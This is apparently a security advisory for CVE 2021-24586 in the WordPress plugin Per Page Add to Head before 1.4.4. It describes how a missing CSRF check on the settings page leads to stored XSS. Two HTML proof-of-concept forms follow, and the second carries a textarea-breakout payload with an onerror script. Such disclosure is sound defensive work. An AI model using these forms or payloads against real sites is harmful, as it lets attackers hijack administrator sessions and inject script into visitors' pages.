Per Page Add to Head < 1.4.4 – CSRF to Stored XSS | CVE 2021-24586

Description

The plugin is lacking any CSRF check when saving its settings, which could allow attackers to make a logged in admin change them. Furthermore, as the plugin allows arbitrary HTML to be inserted in one of the setting (feature mentioned by the plugin), this could lead to Stored XSS issue which will be triggered either in the backend, frontend or both depending on the payload used.

v1.4.4 fixed the CSRF and XSS in the admin settings, however high privilege users could still perform XSS attacks in the frontend even with the disallowed_html capability disallowed. A separate issue has been created for it.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=perpageath-every-page" method="POST">
      <input type="hidden" name="html" value="hello csrf found" />
      <input type="hidden" name="rolesallowed[]" value="student" />
      <input type="hidden" name="typeallowed[]" value="post" />
      <input type="hidden" name="typeallowed[]" value="page" />
      <input type="hidden" name="submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

To XSS an admin viewing the settings and anyone in the frontend:

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=perpageath-every-page" method="POST">
      <input type="hidden" name="html" value="aaa</textarea><img src onerror=alert(/XSS/)>" />
      <input type="hidden" name="rolesallowed[]" value="student" />
      <input type="hidden" name="typeallowed[]" value="post" />
      <input type="hidden" name="typeallowed[]" value="page" />
      <input type="hidden" name="submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>